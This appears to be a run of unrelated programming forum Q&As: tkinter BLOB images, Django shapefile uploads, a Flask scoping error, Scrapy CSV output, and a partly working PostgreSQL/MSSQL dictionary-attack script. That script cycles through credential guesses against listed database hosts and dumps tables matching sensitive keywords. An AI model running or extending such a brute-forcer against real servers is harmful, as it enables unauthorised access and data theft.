I have a CRUD form with entries and four buttons for deleting, updating, creating, and getting values from my database. I want to implement another button that opens an image bound to my id entry, and that also works with my deleting, updating, creating, and getting buttons. I've been trying to use BLOBs, and I'm able to save an image in my database as a BLOB. I understand that I need to create textvariables for my entries, like idvar = StringVar(), namevar = StringVar(), etc., but I'm not sure how to do the same for an image label so that it works with my CRUD buttons.
This is the code I have so far, and it works well saving images into my photo column:
from tkinter import *
import sqlite3

top = Tk()
top.configure(width=444, height=400)

conn = sqlite3.connect('test.db')
c = conn.cursor()

def enterdata():
    id = 'hello'
    photo = convert_pic()
    # Here my id has integer value and my photo has BLOB value in my database
    c.execute('INSERT INTO test (id, photo) VALUES (?, ?)', (id, photo))
    conn.commit()

def convert_pic():
    filename = 'images/image6.jpg'
    with open(filename, 'rb') as file:
        photo = file.read()
    return photo

btn = Button(top, text='save photo', command=enterdata)
btn.place(x=100, y=111)

mainloop()
Now that you have the BLOB, you can use io.BytesIO to load it. Here is an example to demonstrate:
from PIL import Image, ImageTk
from io import BytesIO

def show(data):
    img_byte = BytesIO(data)
    img = ImageTk.PhotoImage(Image.open(img_byte))
    Label(root, image=img).pack()
    root.image = img  # Keep a reference
So now you can query the database and fetch the value:
def fetch():
    c = conn.cursor()
    id = 1  # Any id
    c.execute('SELECT photo FROM test WHERE id=?', (id,))
    data = c.fetchall()[0][0]  # Get the blob data
    show(data)  # Call the function with the fetched data
This will show the image in a label in the root window for the entered id.
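If you want to wire this into your CRUD form, you can bind the id entry to a StringVar and have the button pass its current value to fetch(). A minimal sketch, assuming the conn, c, and show() objects from above (widget placement is illustrative):

idvar = StringVar()
Entry(root, textvariable=idvar).pack()

def fetch_by_id():
    # Read the id the user typed, look up its BLOB, and display it
    c.execute('SELECT photo FROM test WHERE id=?', (idvar.get(),))
    row = c.fetchone()
    if row:
        show(row[0])

Button(root, text='show photo', command=fetch_by_id).pack()

The same idvar.get() value can then drive your delete, update, and create handlers, so the image button shares state with the rest of the form.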
So, the goal is to create a webpage that a .shp file can be loaded into, returning a summary of some calculations as a JsonResponse. I have prepared the calculations and everything works nicely when I add a manual path to the file in question. However, the goal is for someone else to be able to upload the data and get back the response, so I can't hardcode my path.
The overall approach:
Read the file in through forms.FileField() and request.FILES['file_name']. After this, I need to pass this request.FILES object to DataSource in order to read it. I would rather not save the file to disk if possible, but work with it directly from memory.
forms.py
from django import forms
from django.core.files.storage import FileSystemStorage

class UploadFileForm(forms.Form):
    # title = forms.CharField(max_length=50)
    file = forms.FileField()
views.py
import json
import os
from django.http import Http404, HttpResponse, HttpResponseRedirect
from django.shortcuts import render
from django.template import loader
from django.contrib import messages
from django.views.generic import TemplateView
from django.http import JsonResponse
from django.conf import settings
from .forms import UploadFileForm
from . import models
from django.shortcuts import redirect
from gisapp.functions.functions import handle_uploaded_file, handle_uploaded_file_two
from django.contrib.gis.gdal import DataSource
from django.core.files.uploadedfile import UploadedFile, TemporaryUploadedFile
import geopandas as gpd
import fiona
def upload_file(request):
    if request.method == 'POST':
        form = UploadFileForm(request.POST, request.FILES)
        if form.is_valid():
            f = request.FILES['file']
            # geo2 = gpd.read_file(f)
            # print(geo2)
            # f_path = os.path.abspath(os.path.join(os.path.dirname(f), f))
            # f_path = TemporaryUploadedFile.temporary_file_path(UploadedFile(f))
            # print(f_path)
            # f_path = f.temporary_file_path()
            # new_path = request.FILES['file'].temporary_file_path
            # print(f'This is file path: {f_path}')
            # print(f'This is file path: {new_path}')
            # data = DataSource(f'gisapp/data/{f}')  # given an absolute path it works great
            data = DataSource(f)  # constantly failing
            # data = DataSource(new_path)
            # print(f'This is file path: {f_path}')
            layer = data[0]
            if layer.geom_type.name == "Polygon" or layer.geom_type.name == "LineString":
                handle_uploaded_file(request.FILES['file'])
            elif layer.geom_type.name == "Point":
                handle_uploaded_file_two(request.FILES['file'])
                return JsonResponse({"Count": f"{handle_uploaded_file_two(request.FILES['file'])[0]}", "Bounding Box": f"{handle_uploaded_file_two(request.FILES['file'])[1]}"})
            # return JsonResponse({"Count": f"{handle_uploaded_file(request.FILES['file'])[0]}", "Minimum": f"{handle_uploaded_file(request.FILES['file'])[1]}", "Maximum": f"{handle_uploaded_file(request.FILES['file'])[1]}"})
            # instance = models.GeometryUpload(file_field=request.FILES['file'])
            # instance.save()
            # # return HttpResponseRedirect('/success/')
    else:
        form = UploadFileForm()
    return render(request, 'upload.html', {'form': form})
Error I get:
django.contrib.gis.gdal.error.GDALException: Invalid data source input type: <class 'django.core.files.uploadedfile.InMemoryUploadedFile'>
Now as you can see from upload_file() in views.py, I tried a multitude of operations; when I add an absolute path it works, but otherwise I can't seem to get the uploaded file into DataSource so that I can use it in my later analysis.
Looking at how Django handles this, it doesn't appear possible to work off of an in-memory file. The path to the file is passed to the C API for OGR, which then handles opening the file and reading it in.
A possible solution that I am trying myself is to have the user zip their shapefiles (.shp, .shx, .dbf, etc.) beforehand. The zip file is then uploaded and unzipped, and the .shp file can then be read. Hope this helps.
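A rough sketch of that approach, assuming the user uploads a single .zip containing all the shapefile parts (the helper name and view wiring are illustrative):

import os
import tempfile
import zipfile
from django.contrib.gis.gdal import DataSource

def datasource_from_zip(uploaded_zip):
    # Extract the uploaded archive to a temporary directory so OGR
    # gets a real filesystem path to the .shp and its companions.
    tmpdir = tempfile.mkdtemp()
    with zipfile.ZipFile(uploaded_zip) as zf:
        zf.extractall(tmpdir)
    shp_name = next(n for n in os.listdir(tmpdir) if n.endswith('.shp'))
    return DataSource(os.path.join(tmpdir, shp_name))

In upload_file() you would then call datasource_from_zip(request.FILES['file']) instead of DataSource(f).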
I faced the same problem, and my workaround was to save the file uploaded by the user in a temporary folder, then pass the absolute path of the temporary file to my DataSource. After finishing all my processing with the temporary file, I deleted it.
The downside of this method is the execution time; it is slow.
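For reference, a minimal sketch of that workaround (names are illustrative; note that the .shx/.dbf companions would need to be saved alongside the .shp for OGR to open it):

import os
import shutil
import tempfile
from django.contrib.gis.gdal import DataSource

def process_via_tempfile(uploaded_file):
    tmpdir = tempfile.mkdtemp()
    tmp_path = os.path.join(tmpdir, uploaded_file.name)
    # Write the in-memory upload to disk chunk by chunk
    with open(tmp_path, 'wb') as out:
        for chunk in uploaded_file.chunks():
            out.write(chunk)
    try:
        data = DataSource(tmp_path)
        return data[0].geom_type.name
    finally:
        shutil.rmtree(tmpdir)  # delete the temporary copy when done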
I am trying to make this web app work, but I am getting an error. These are the steps the web app is supposed to handle:
import a file
run the python script
export the results
When I run the Python script independently (without Flask; I use a Jupyter notebook), it works fine. On the other hand, when I run it with Flask (from the prompt), I get an error:
File "app.py", line 88, in <module>
for name, df in transformed_dict.items():
NameError: name 'transformed_dict' is not defined
Any idea of how I can make this web app work?
This is my first time using Flask, and I would appreciate any suggestions or guidance.
Python file (the HTML file is not included below):
from flask import Flask, render_template, request, send_file
from flask_sqlalchemy import SQLAlchemy
import os
import pandas as pd
from openpyxl import load_workbook
import sqlalchemy as db

def transform(df):
    # Some data processing here
    return df

app = Flask(__name__)

@app.route('/')
def index():
    return render_template('firstpage.html')

@app.route('/upload', methods=['GET', 'POST'])
def upload():
    file = request.files['inputfile']
    xls = pd.ExcelFile(file)
    name_dict = {}
    snames = xls.sheet_names
    for sn in snames:
        name_dict[sn] = xls.parse(sn)
    for key, value in name_dict.items():
        transform(value)
    transformed_dict = {}
    for key, value in name_dict.items():
        transformed_dict[key] = transform(value)

#### write to excel example:
writer = pd.ExcelWriter("MyData.xlsx", engine='xlsxwriter')
for name, df in transformed_dict.items():
    df.to_excel(writer, sheet_name=name)
writer.save()

if __name__ == '__main__':
    app.run(port=5000)
Your block:
#### write to excel example:
writer = pd.ExcelWriter("MyData.xlsx", engine='xlsxwriter')
for name, df in transformed_dict.items():
    df.to_excel(writer, sheet_name=name)
writer.save()
should be part of your upload() function, since that's where you define and fill transformed_dict. You just need to indent it to match the block above it.
The current error comes up because Python runs that module-level code as soon as you start the script, and transformed_dict doesn't exist at that point.
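Something like this (a sketch of the corrected upload(); the send_file return at the end is my addition, since a Flask view has to return a response):

@app.route('/upload', methods=['GET', 'POST'])
def upload():
    file = request.files['inputfile']
    xls = pd.ExcelFile(file)
    name_dict = {}
    for sn in xls.sheet_names:
        name_dict[sn] = xls.parse(sn)
    transformed_dict = {}
    for key, value in name_dict.items():
        transformed_dict[key] = transform(value)
    # The write-to-excel block now runs inside upload(),
    # where transformed_dict is defined.
    writer = pd.ExcelWriter("MyData.xlsx", engine='xlsxwriter')
    for name, df in transformed_dict.items():
        df.to_excel(writer, sheet_name=name)
    writer.save()
    return send_file("MyData.xlsx")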
I am creating a dictionary-attack tool for PostgreSQL. The tool is inspired by the work of m8r0wn - the enumdb tool. Mike's tool is aimed at MySQL and MSSQL. I aim to use the same approach he used, but modify the actions and the output file. The script should:
1) Read a CSV file that contains targets and ports, one per line, e.g. 127.0.0.1,3380.
2) When provided a list of usernames and/or passwords, cycle through each targeted host looking for valid credentials. By default, it will use newly discovered credentials to search for sensitive information in the host's databases via keyword searches on the table or column names.
3) Extract this information and report it to a JSON, .csv, or .xlsx output file.
I have semi-functional code, but I suspect the PostgreSQL connection function is not working because of the logic behind passing parameters. I am also interested in suggestions on how best to present the tool's results as a JSON file.
I understand that in Python, we have several modules available to connect and work with PostgreSQL which include:
Psycopg2
pg8000
py-postgresql
PyGreSQL
ocpgdb
bpgsql
SQLAlchemy
see also https://www.a2hosting.co.za/kb/developer-corner/postgresql/connecting-to-postgresql-using-python
The connection methods I have tried include:
import psycopg2
from psycopg2 import Error
conn = psycopg2.connect(host=host, dbname=db_name, user=_user, password=_pass, port=port)

import pg
conn = pg.DB(host=args.hostname, user=_user, passwd=_pass)

# sudo pip install pgdb
import pgdb
conn = pgdb.connect(host=args.hostname, user=_user, passwd=_pass)
I am not sure how to pass the different _user and _pass guesses into psycopg2, for instance, without breaking the code.
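What I have in mind is roughly this (a minimal sketch; the host, port, and word lists are placeholders):

import psycopg2

def try_credentials(host, port, users, passwords):
    # Try each user/password pair; connect() raises OperationalError
    # on a failed login, so a successful call means a valid pair.
    for user in users:
        for passwd in passwords:
            try:
                con = psycopg2.connect(host=host, port=port, dbname='postgres',
                                       user=user, password=passwd, connect_timeout=3)
                return user, passwd, con
            except psycopg2.OperationalError:
                continue
    return None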
I have imported the following libraries:
import re
import psycopg2
from psycopg2 import Error
import pgdb
#import MySQLdb
import pymssql
import argparse
from time import sleep
from sys import exit, argv
from getpass import getpass
from os import path, remove
from openpyxl import Workbook
from threading import Thread, activeCount
The PgSQL block is as follows:
##########################################
# PgSQL DB Class
##########################################
class pgsql():
    def connect(self, host, port, user, passwd, verbose):
        try:
            con = pgdb.connect(host=host, port=port, user=user, password=passwd, connect_timeout=3)
            con.query_timeout = 15
            print_success("[*] Connection established {}:{}@{}".format(user, passwd, host))
            return con
        except Exception as e:
            if verbose:
                print_failure("[!] Login failed {}:{}@{}\t({})".format(user, passwd, host, e))
            else:
                print_failure("[!] Login failed {}:{}@{}".format(user, passwd, host))
            return False

    def db_query(self, con, cmd):
        try:
            cur = con.cursor()
            cur.execute(cmd)
            data = cur.fetchall()
            cur.close()
        except:
            data = ''
        return data

    def get_databases(self, con):
        databases = []
        for x in self.db_query(con, 'SHOW DATABASES;'):
            databases.append(x[0])
        return databases

    def get_tables(self, con, database):
        tables = []
        self.db_query(con, "USE {}".format(database))
        for x in self.db_query(con, 'SHOW TABLES;'):
            tables.append(x[0])
        return tables

    def get_columns(self, con, database, table):
        # database var not used but kept to support mssql
        columns = []
        for x in self.db_query(con, 'SHOW COLUMNS FROM {}'.format(table)):
            columns.append(x[0])
        return columns

    def get_data(self, con, database, table):
        # database var not used but kept to support mssql
        return self.db_query(con, 'SELECT * FROM {} LIMIT {}'.format(table, SELECT_LIMIT))
The MSSQL class is as follows:
# MSSQL DB Class
class mssql():
    def connect(self, host, port, user, passwd, verbose):
        try:
            con = pymssql.connect(server=host, port=port, user=user, password=passwd, login_timeout=3, timeout=15)
            print_success("[*] Connection established {}:{}@{}".format(user, passwd, host))
            return con
        except Exception as e:
            if verbose:
                print_failure("[!] Login failed {}:{}@{}\t({})".format(user, passwd, host, e))
            else:
                print_failure("[!] Login failed {}:{}@{}".format(user, passwd, host))
            return False

    def db_query(self, con, cmd):
        try:
            cur = con.cursor()
            cur.execute(cmd)
            data = cur.fetchall()
            cur.close()
        except:
            data = ''
        return data

    def get_databases(self, con):
        databases = []
        for x in self.db_query(con, 'SELECT NAME FROM sys.Databases;'):
            databases.append(x[0])
        return databases

    def get_tables(self, con, database):
        tables = []
        for x in self.db_query(con, 'SELECT NAME FROM {}.sys.tables;'.format(database)):
            tables.append(x[0])
        return tables

    def get_columns(self, con, database, table):
        columns = []
        for x in self.db_query(con, 'USE {};SELECT column_name FROM information_schema.columns WHERE table_name = \'{}\';'.format(database, table)):
            columns.append(x[0])
        return columns

    def get_data(self, con, database, table):
        return self.db_query(con, 'SELECT TOP({}) * FROM {}.dbo.{};'.format(SELECT_LIMIT, database, table))
The main function block:
def main(args):
    try:
        for t in args.target:
            x = Thread(target=enum_db().db_main, args=(args, t,))
            x.daemon = True
            x.start()
            # Do not exceed max threads
            while activeCount() > args.max_threads:
                sleep(0.001)
        # Exit all threads before closing
        while activeCount() > 1:
            sleep(0.001)
    except KeyboardInterrupt:
        print("\n[!] Key Event Detected...\n\n")
        exit(0)

if __name__ == '__main__':
    version = '1.0.7'
    try:
        args = argparse.ArgumentParser(description=("""
               {0} (v{1})
--------------------------------------------------
Brute force Juggernaut is a PgSQL brute forcing tool.**""").format(argv[0], version), formatter_class=argparse.RawTextHelpFormatter, usage=argparse.SUPPRESS)
        user = args.add_mutually_exclusive_group(required=True)
        user.add_argument('-u', dest='users', type=str, action='append', help='Single username')
        user.add_argument('-U', dest='users', default=False, type=lambda x: file_exists(args, x), help='Users.txt file')
        passwd = args.add_mutually_exclusive_group()
        passwd.add_argument('-p', dest='passwords', action='append', default=[], help='Single password')
        passwd.add_argument('-P', dest='passwords', default=False, type=lambda x: file_exists(args, x), help='Password.txt file')
        args.add_argument('-threads', dest='max_threads', type=int, default=3, help='Max threads (Default: 3)')
        args.add_argument('-port', dest='port', type=int, default=0, help='Specify non-standard port')
        args.add_argument('-r', '-report', dest='report', type=str, default=False, help='Output Report: csv, xlsx (Default: None)')
        args.add_argument('-t', dest='dbtype', type=str, required=True, help='Database types currently supported: mssql, pgsql')
        args.add_argument('-c', '-columns', dest="column_search", action='store_true', help="Search for key words in column names (Default: table names)")
        args.add_argument('-v', dest="verbose", action='store_true', help="Show failed login notices & keyword matches with Empty data sets")
        args.add_argument('-brute', dest="brute", action='store_true', help='Brute force only, do not enumerate')
        args.add_argument(dest='target', nargs='+', help='Target database server(s)')
        args = args.parse_args()

        # Put target input into an array
        args.target = list_targets(args.target[0])

        # Get password if not provided
        if not args.passwords:
            args.passwords = [getpass("Enter password, or continue with null-value: ")]

        # Define default port based on dbtype
        if args.port == 0:
            args.port = default_port(args.dbtype)

        # Launch main
        print("\nStarting enumdb v{}\n".format(version) + "-" * 25)
        main(args)
    except KeyboardInterrupt:
        print("\n[!] Key Event Detected...\n\n")
        exit(0)
I am aware that the documentation at http://initd.org/psycopg/docs/module.html describes how connection parameters can be specified. I would like to pass password guesses into the brute class and recursively try different combinations.
PEP-8 asks that you please give classes a name starting with a capital letter, e.g. Pgsql.
You mentioned that the pgsql connect() method is not working properly, but didn't offer any diagnostics such as a stack trace.
You seem to be working too hard, given that the sqlalchemy layer has already addressed the DB-porting issue quite nicely. Just assemble a connect string starting with the name of the appropriate DB package, and let sqlalchemy take care of the rest.
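For instance, a sketch of that idea (the URL pieces map onto the tool's existing arguments; names are illustrative):

from sqlalchemy import create_engine

def make_engine(dbtype, user, passwd, host, port):
    # Map the -t flag onto a sqlalchemy dialect+driver prefix and
    # let sqlalchemy pick the right DB-API underneath.
    prefix = {'pgsql': 'postgresql+psycopg2', 'mssql': 'mssql+pymssql'}[dbtype]
    return create_engine('{}://{}:{}@{}:{}/'.format(prefix, user, passwd, host, port))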
All your methods accept con as an argument. You really want to factor that out as the object attribute self.con.
The db_query() method apparently assumes that arguments for WHERE clauses already appear, properly quoted, in cmd. According to Little Bobby's mother, it makes sense to accept query args according to the API, rather than worrying about the potential for SQL injection.
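That is, let the driver do the quoting by passing values separately from the SQL; a sketch, against the factored-out self.con:

def db_query(self, cmd, params=None):
    # %s placeholders are filled in by the driver rather than by
    # string formatting, so values are quoted safely.
    cur = self.con.cursor()
    cur.execute(cmd, params or ())
    data = cur.fetchall()
    cur.close()
    return data

# e.g. rows = self.db_query('SELECT * FROM mytable LIMIT %s', (select_limit,))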
I've written a very tiny script in Python Scrapy to parse names, streets, and phone numbers displayed across multiple pages of the yellowpages website. When I run my script, it works smoothly. The only problem I encounter is the way the data gets scraped into the csv output: there is always a blank line (row) between two data rows, so the data is printed on every other row. If it were not for Scrapy, I could have used newline=''. But unfortunately I am totally helpless here. How can I get rid of the blank lines in the csv output? Thanks in advance for taking a look at it.
items.py includes:
import scrapy

class YellowpageItem(scrapy.Item):
    name = scrapy.Field()
    street = scrapy.Field()
    phone = scrapy.Field()
Here is the spider:
import scrapy

class YellowpageSpider(scrapy.Spider):
    name = "YellowpageSp"
    start_urls = ["https://www.yellowpages.com/search?search_terms=Pizza&geo_location_terms=Los%20Angeles%2C%20CA&page={0}".format(page) for page in range(2, 6)]

    def parse(self, response):
        for titles in response.css('div.info'):
            name = titles.css('a.business-name span[itemprop=name]::text').extract_first()
            street = titles.css('span.street-address::text').extract_first()
            phone = titles.css('div[itemprop=telephone]::text').extract_first()
            yield {'name': name, 'street': street, 'phone': phone}
The csv output has a blank row between every two records. Btw, the command I'm using to get the csv output is:
scrapy crawl YellowpageSp -o items.csv -t csv
You can fix it by creating a new feed exporter. Change your settings.py as below:
FEED_EXPORTERS = {
    'csv': 'project.exporters.FixLineCsvItemExporter',
}
Create an exporters.py in your project:
import io
import os
import six
import csv
from scrapy.contrib.exporter import CsvItemExporter
from scrapy.extensions.feedexport import IFeedStorage
from w3lib.url import file_uri_to_path
from zope.interface import implementer

@implementer(IFeedStorage)
class FixedFileFeedStorage(object):

    def __init__(self, uri):
        self.path = file_uri_to_path(uri)

    def open(self, spider):
        dirname = os.path.dirname(self.path)
        if dirname and not os.path.exists(dirname):
            os.makedirs(dirname)
        return open(self.path, 'ab')

    def store(self, file):
        file.close()

class FixLineCsvItemExporter(CsvItemExporter):
    def __init__(self, file, include_headers_line=True, join_multivalued=',', **kwargs):
        super(FixLineCsvItemExporter, self).__init__(file, include_headers_line, join_multivalued, **kwargs)
        self._configure(kwargs, dont_fail=True)
        self.stream.close()
        storage = FixedFileFeedStorage(file.name)
        file = storage.open(file.name)
        self.stream = io.TextIOWrapper(
            file,
            line_buffering=False,
            write_through=True,
            encoding=self.encoding,
            newline="",
        ) if six.PY3 else file
        self.csv_writer = csv.writer(self.stream, **kwargs)
I am on a Mac, so I can't test the Windows behavior. If the above doesn't work, change the part of the code below and set newline="\n":
self.stream = io.TextIOWrapper(
    file,
    line_buffering=False,
    write_through=True,
    encoding=self.encoding,
    newline="\n",
) if six.PY3 else file